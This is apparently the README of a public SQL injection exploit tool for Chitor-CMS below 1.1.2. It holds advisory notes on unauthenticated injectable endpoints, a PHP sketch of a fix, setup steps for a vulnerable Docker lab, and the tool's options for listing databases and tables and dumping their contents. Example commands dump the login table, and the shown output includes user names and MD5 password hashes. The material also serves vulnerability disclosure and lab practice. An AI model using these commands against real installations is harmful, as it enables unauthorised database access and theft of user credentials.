https://github.com/waqaskanju/Chitor-CMS
Project by waqaskanju 2023/04/13
An SQL injection was found in the /edit_school.php?id= endpoint; it does not require any authentication. 2023/04/09
SQL injections were found in multiple endpoints, such as /add_school_class.php?school=, that do not require any authentication. Since commit 5f76192, these endpoints verify that the logged-in user has editing rights. This check was already in place before but was not functional.
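As an added illustration, not code from Chitor-CMS or from this repository, the following sketches the two-part fix the notes above describe: an edit-rights check that actually stops the request instead of only evaluating a condition, and a prepared statement for the id parameter. The names $conn, user_can_edit(), the session keys and the school table columns are assumptions.

```php
<?php
// Hypothetical hardened handler in the spirit of edit_school.php (assumption:
// this is not the project's own code). Two defects are addressed:
//   1. an edit-rights check that computed a result but never ended the request;
//   2. an id parameter that was interpolated straight into the SQL text, e.g.
//      mysqli_query($conn, "SELECT ... WHERE id = " . $_GET['id']);
session_start();

// Assumed: db.php provides $conn (mysqli) and user_can_edit(int $userId): bool.
require_once 'db.php';

function require_edit_rights(): void
{
    // A check is only a control if the request terminates when it fails.
    if (empty($_SESSION['user_id']) || !user_can_edit((int) $_SESSION['user_id'])) {
        http_response_code(403);
        exit('Forbidden');
    }
}

require_edit_rights();

// Validate before the value reaches the database: id must be a positive integer.
// FILTER_VALIDATE_INT returns false on a non-integer and null when id is absent.
$id = filter_input(INPUT_GET, 'id', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
if ($id === false || $id === null) {
    http_response_code(400);
    exit('Bad request');
}

// Prepared statement: the value is bound as an integer and never becomes part
// of the query string, so the contents of ?id= cannot change the SQL.
$stmt = $conn->prepare('SELECT id, name FROM school WHERE id = ?');
$stmt->bind_param('i', $id);
$stmt->execute();
$school = $stmt->get_result()->fetch_assoc();
$stmt->close();

if ($school === null) {
    http_response_code(404);
    exit('Not found');
}
```

The authorisation check limits who can reach the query, but on its own it would not remove the injection; the bound parameter is what closes it, so both parts are needed.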
sudo apt install git virtualenv python3 python3-pip docker-compose
git clone https://github.com/msd0pe-1/chitor-sqli
virtualenv -p python3 venv
source venv/bin/activate
pip3 install requests prettytable
TO START THE VULNERABLE DOCKER:
- sudo ./run.sh [1.0|1.1]
TO STOP AND CLEAN THE DOCKER:
- sudo ./clean.sh
Usage: python chitor1.1.py [options]
Options:
--version show program's version number and exit
-h, --help show this help message and exit
-u URL, --url=URL target url
--dbs list databases
-D DATABASE, --db=DATABASE
select a database
--tables list tables
-T TABLE, --table=TABLE
select a table
--dump dump the content
Examples:
python3 chitor1.1.py -u http://127.0.0.1 --dbs
python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db --tables
python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db -T login --dump
Chitor-CMS < 1.1.2 Pre-Auth SQL Injection.
Source code put in public domain by msd0pe, no Copyright
Any malicious or illegal activity may be punishable by law
Use at your own risk
python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db -T login --dump
+----+-------------+------------+----------------------------------+--------+
| Id | Employee_Id | User_Name | Password | Status |
+----+-------------+------------+----------------------------------+--------+
| 1 | 1 | Guest | adb831a7fdd83dd1e2a309ce7591dff8 | 1 |
| 2 | 2 | waqaskanju | ################################ | 1 |
| 3 | 3 | admin | 21232f297a57a5a743894a0e4a801fc3 | 1 |
+----+-------------+------------+----------------------------------+--------+